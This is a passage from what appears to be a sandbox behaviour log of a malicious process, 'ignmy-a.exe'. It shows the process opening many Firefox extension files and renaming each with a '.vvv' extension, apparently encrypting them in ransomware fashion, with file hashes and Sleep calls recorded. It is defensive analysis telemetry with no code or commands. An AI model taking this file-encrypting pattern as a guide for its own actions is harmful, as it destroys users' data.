  11236.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\cud
  11237.   dlefish.js
  11238.     828     6789
  11239. File   
  11240. Close
  11241.    
  11242. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11243.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\cud
  11244.   dlefish.js
  11245.  MD5:  c8aeb974927b85916b08f76cf0edf8b6
  11246.  SHA1: 635ab5f64d8c8191ea42829c5c3b0033200e09ed
  11247.     828     7214
  11248. File   
  11249. Rename
  11250.    
  11251. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11252.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\cud
  11253.   dlefish.js
  11254. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11255.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\cud
  11256.   dlefish.js.vvv
  11257.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11258.  MD5:  c8aeb974927b85916b08f76cf0edf8b6
  11259.  SHA1: 635ab5f64d8c8191ea42829c5c3b0033200e09ed
  11260.     828     7214
  11261. File   
  11262. Open
  11263.    
  11264. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11265.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom
  11266.   \events\keys.js
  11267.     828     3285
  11268. File   
  11269. Close
  11270.    
  11271. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11272.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom
  11273.   \events\keys.js
  11274.  MD5:  ad702682de17f656c14e3fa002ecfb6e
  11275.  SHA1: 535db937229178a24dcf6351cd59c70ef34c0594
  11276.     828     3710
  11277. File   
  11278. Rename
  11279.    
  11280. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11281.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom
  11282.   \events\keys.js
  11283. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11284.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom
  11285.   \events\keys.js.vvv
  11286.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11287.  MD5:  ad702682de17f656c14e3fa002ecfb6e
  11288.  SHA1: 535db937229178a24dcf6351cd59c70ef34c0594
  11289.     828     3710
  11290. File   
  11291. Open
  11292.    
  11293. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11294.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom
  11295.   \events.js
  11296.     828     7418
  11297. File   
  11298. Close
  11299.    
  11300. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11301.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom
  11302.   \events.js
  11303.  MD5:  7c1e9ac9a073b9ff7aae2f60b139a168
  11304.  SHA1: fe55c4d6ecdd9ebd3b433164836d1d7ae9ec51c9
  11305.     828     7838
  11306. File   
  11307. Rename
  11308.    
  11309. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11310.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom
  11311.   \events.js
  11312. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11313.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\dom
  11314.   \events.js.vvv
  11315.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11316.  MD5:  7c1e9ac9a073b9ff7aae2f60b139a168
  11317.  SHA1: fe55c4d6ecdd9ebd3b433164836d1d7ae9ec51c9
  11318.     828     7838
  11319. File   
  11320. Open
  11321.    
  11322. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11323.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\e10
  11324.   s.js
  11325.     828     7984
  11326. File   
  11327. Close
  11328.    
  11329. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11330.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\e10
  11331.   s.js
  11332.  MD5:  83bf24143e38136d9161051085b43ae2
  11333.  SHA1: 49e5f38e82c68bddf41429068385b91004534550
  11334.     828     8414
  11335. File   
  11336. Rename
  11337.    
  11338. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11339.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\e10
  11340.   s.js
  11341. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11342.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\e10
  11343.   s.js.vvv
  11344.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11345.  MD5:  83bf24143e38136d9161051085b43ae2
  11346.  SHA1: 49e5f38e82c68bddf41429068385b91004534550
  11347.     828     8414
  11348. File   
  11349. Open
  11350.    
  11351. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11352.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\err
  11353.   ors.js
  11354.     828     3447
  11355. File   
  11356. Close
  11357.    
  11358. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11359.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\err
  11360.   ors.js
  11361.  MD5:  546e5f916ef4a1837d6c7f18b2409413
  11362.  SHA1: 7787e1eeba103f1700f6c6b7350eab0fbb8cc063
  11363.     828     3870
  11364. File   
  11365. Rename
  11366.    
  11367. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11368.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\err
  11369.   ors.js
  11370. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11371.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\err
  11372.   ors.js.vvv
  11373.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11374.  MD5:  546e5f916ef4a1837d6c7f18b2409413
  11375.  SHA1: 7787e1eeba103f1700f6c6b7350eab0fbb8cc063
  11376.     828     3870
  11377. File   
  11378. Open
  11379.    
  11380. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11381.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\eve
  11382.   nts\assembler.js
  11383.     828     3456
  11384. File   
  11385. Close
  11386.    
  11387. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11388.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\eve
  11389.   nts\assembler.js
  11390.  MD5:  b0880ebfcc451d6d9cfe36e6b8632fa1
  11391.  SHA1: 1034f16042129589c51489216bd52b9eb7d82000
  11392.     828     3886
  11393. File   
  11394. Rename
  11395.    
  11396. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11397.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\eve
  11398.   nts\assembler.js
  11399. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11400.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\eve
  11401.   nts\assembler.js.vvv
  11402.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11403.  MD5:  b0880ebfcc451d6d9cfe36e6b8632fa1
  11404.  SHA1: 1034f16042129589c51489216bd52b9eb7d82000
  11405.     828     3886
  11406. File   
  11407. Open
  11408.    
  11409. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11410.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\eve
  11411.   nts.js
  11412.     828     7598
  11413. File   
  11414. Close
  11415.    
  11416. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11417.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\eve
  11418.   nts.js
  11419.  MD5:  a2c918014f730e5f1706a2d81361d7f0
  11420.  SHA1: 712151d7fde52d5725efd410cdbe6eff1aa97d61
  11421.     828     8014
  11422. File   
  11423. Rename
  11424.    
  11425. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11426.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\eve
  11427.   nts.js
  11428. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11429.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\eve
  11430.   nts.js.vvv
  11431.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11432.  MD5:  a2c918014f730e5f1706a2d81361d7f0
  11433.  SHA1: 712151d7fde52d5725efd410cdbe6eff1aa97d61
  11434.     828     8014
  11435. File   
  11436. Open
  11437.    
  11438. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11439.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\fil
  11440.   e.js
  11441.     828     6618
  11442. API Call   
  11443.    
  11444.  API Name:  Sleep   Address:  0x0041f00b
  11445.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  11446.     828      
  11447. File   
  11448. Close
  11449.    
  11450. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11451.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\fil
  11452.   e.js
  11453.  MD5:  b0d89dda922b7edeed00e88ad30bccf6
  11454.  SHA1: 8e64ca3dad0cb8b0d6be37c85630c3965e1ebefe
  11455.     828     7038
  11456. File   
  11457. Rename
  11458.    
  11459. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11460.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\fil
  11461.   e.js
  11462. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11463.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\fil
  11464.   e.js.vvv
  11465.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11466.  MD5:  b0d89dda922b7edeed00e88ad30bccf6
  11467.  SHA1: 8e64ca3dad0cb8b0d6be37c85630c3965e1ebefe
  11468.     828     7038
  11469. File   
  11470. Open
  11471.    
  11472. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11473.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\fin
  11474.   d-tests-e10s-adapter.js
  11475.     828     3970
  11476. File   
  11477. Close
  11478.    
  11479. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11480.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\fin
  11481.   d-tests-e10s-adapter.js
  11482.  MD5:  28df72f4aa0e64896d613cf3988cd788
  11483.  SHA1: 16950d70a58994517cffb49a91125da73d75ad50
  11484.     828     4398
  11485. File   
  11486. Rename
  11487.    
  11488. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11489.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\fin
  11490.   d-tests-e10s-adapter.js
  11491. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11492.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\fin
  11493.   d-tests-e10s-adapter.js.vvv
  11494.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11495.  MD5:  28df72f4aa0e64896d613cf3988cd788
  11496.  SHA1: 16950d70a58994517cffb49a91125da73d75ad50
  11497.     828     4398
  11498. File   
  11499. Open
  11500.    
  11501. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11502.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\fin
  11503.   d-tests.js
  11504.     828     38
  11505. File   
  11506. Close
  11507.    
  11508. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11509.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\fin
  11510.   d-tests.js
  11511.  MD5:  2c9bd4411e320a4685c4d7d5e385f280
  11512.  SHA1: 4428877b8a9008525f641aec18eaa05f018ee249
  11513.     828     462
  11514. File   
  11515. Rename
  11516.    
  11517. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11518.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\fin
  11519.   d-tests.js
  11520. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11521.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\fin
  11522.   d-tests.js.vvv
  11523.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11524.  MD5:  2c9bd4411e320a4685c4d7d5e385f280
  11525.  SHA1: 4428877b8a9008525f641aec18eaa05f018ee249
  11526.     828     462
  11527. File   
  11528. Open
  11529.    
  11530. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11531.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\hid
  11532.   den-frame.js
  11533.     828     7014
  11534. File   
  11535. Close
  11536.    
  11537. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11538.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\hid
  11539.   den-frame.js
  11540.  MD5:  27a277aa25bb63015c45b2f28255e4e7
  11541.  SHA1: ec4c9e426250d2f072ffa624942e1c5bc20fddb5
  11542.     828     7438
  11543. File   
  11544. Rename
  11545.    
  11546. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11547.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\hid
  11548.   den-frame.js
  11549. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11550.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\hid
  11551.   den-frame.js.vvv
  11552.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11553.  MD5:  27a277aa25bb63015c45b2f28255e4e7
  11554.  SHA1: ec4c9e426250d2f072ffa624942e1c5bc20fddb5
  11555.     828     7438
  11556. File   
  11557. Open
  11558.    
  11559. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11560.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\key
  11561.   board\hotkeys.js
  11562.     828     5226
  11563. API Call   
  11564.    
  11565.  API Name:  Sleep   Address:  0x0041f00b
  11566.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  11567.     828      
  11568. File   
  11569. Close
  11570.    
  11571. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11572.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\key
  11573.   board\hotkeys.js
  11574.  MD5:  458bb103471341141438e65bc84fb271
  11575.  SHA1: 3bc0b53d08c027ee88fa7b668af511c2ed07e7f8
  11576.     828     5646
  11577. File   
  11578. Rename
  11579.    
  11580. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11581.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\key
  11582.   board\hotkeys.js
  11583. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11584.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\key
  11585.   board\hotkeys.js.vvv
  11586.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11587.  MD5:  458bb103471341141438e65bc84fb271
  11588.  SHA1: 3bc0b53d08c027ee88fa7b668af511c2ed07e7f8
  11589.     828     5646
  11590. File   
  11591. Open
  11592.    
  11593. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11594.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\key
  11595.   board\observer.js
  11596.     828     3351
  11597. File   
  11598. Close
  11599.    
  11600. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11601.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\key
  11602.   board\observer.js
  11603.  MD5:  7a56c7b9a1cd7aa55e3b160119f15e76
  11604.  SHA1: 1b924494f332ab661dd084049174515164b01bde
  11605.     828     3774
  11606. File   
  11607. Rename
  11608.    
  11609. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11610.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\key
  11611.   board\observer.js
  11612. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11613.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\key
  11614.   board\observer.js.vvv
  11615.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11616.  MD5:  7a56c7b9a1cd7aa55e3b160119f15e76
  11617.  SHA1: 1b924494f332ab661dd084049174515164b01bde
  11618.     828     3774
  11619. File   
  11620. Open
  11621.    
  11622. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11623.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\key
  11624.   board\utils.js
  11625.     828     6658
  11626. File   
  11627. Close
  11628.    
  11629. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11630.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\key
  11631.   board\utils.js
  11632.  MD5:  44debf2c3e817809bf1b4074fb8856d4
  11633.  SHA1: 5c11331016b6dfe8dffbfae3796d066be38fb864
  11634.     828     7086
  11635. File   
  11636. Rename
  11637.    
  11638. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11639.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\key
  11640.   board\utils.js
  11641. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11642.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\key
  11643.   board\utils.js.vvv
  11644.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11645.  MD5:  44debf2c3e817809bf1b4074fb8856d4
  11646.  SHA1: 5c11331016b6dfe8dffbfae3796d066be38fb864
  11647.     828     7086
  11648. File   
  11649. Open
  11650.    
  11651. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11652.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\lig
  11653.   ht-traits.js
  11654.     828     23934
  11655. File   
  11656. Close
  11657.    
  11658. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11659.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\lig
  11660.   ht-traits.js
  11661.  MD5:  cbd093d6334de8aab496557c0e67522f
  11662.  SHA1: 9e8c2e6059999b0c07e18ebbb2d659b415af239e
  11663.     828     24350
  11664. File   
  11665. Rename
  11666.    
  11667. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11668.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\lig
  11669.   ht-traits.js
  11670. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11671.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\lig
  11672.   ht-traits.js.vvv
  11673.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11674.  MD5:  cbd093d6334de8aab496557c0e67522f
  11675.  SHA1: 9e8c2e6059999b0c07e18ebbb2d659b415af239e
  11676.     828     24350
  11677. File   
  11678. Open
  11679.    
  11680. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11681.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\lis
  11682.   t.js
  11683.     828     5363
  11684. File   
  11685. Close
  11686.    
  11687. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11688.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\lis
  11689.   t.js
  11690.  MD5:  8b5c4e5c525ed0d87568ac6593e27214
  11691.  SHA1: 21448224aece333c421a611d7492d564653d9da9
  11692.     828     5790
  11693. File   
  11694. Rename
  11695.    
  11696. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11697.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\lis
  11698.   t.js
  11699. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11700.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\lis
  11701.   t.js.vvv
  11702.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11703.  MD5:  8b5c4e5c525ed0d87568ac6593e27214
  11704.  SHA1: 21448224aece333c421a611d7492d564653d9da9
  11705.     828     5790
  11706. File   
  11707. Open
  11708.    
  11709. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11710.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\mat
  11711.   ch-pattern.js
  11712.     828     5222
  11713. File   
  11714. Close
  11715.    
  11716. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11717.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\mat
  11718.   ch-pattern.js
  11719.  MD5:  63619193a70c205e805bbbec24533c2b
  11720.  SHA1: 8c42f1651fb5fdf16a624374d41849e76ef833d5
  11721.     828     5646
  11722. File   
  11723. Rename
  11724.    
  11725. Old Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11726.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\mat
  11727.   ch-pattern.js
  11728. New Name:   C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11729.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\mat
  11730.   ch-pattern.js.vvv
  11731.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe
  11732.  MD5:  63619193a70c205e805bbbec24533c2b
  11733.  SHA1: 8c42f1651fb5fdf16a624374d41849e76ef833d5
  11734.     828     5646
  11735. File   
  11736. Open
  11737.    
  11738. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11739.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\mem
  11740.   ory.js
  11741.     828     4754
  11742. File   
  11743. Close
  11744.    
  11745. C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\
  11746.   extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\mem
  11747.   ory.js
  11748.  MD5:  ef073f99f00bdba3bd77283081594e51
  11749.  SHA1: 3cff2f538594dc0b88d7403a877dc522c5893859
  11750.     828     5182
  11751. File   
  11752. Rename
  11753.    
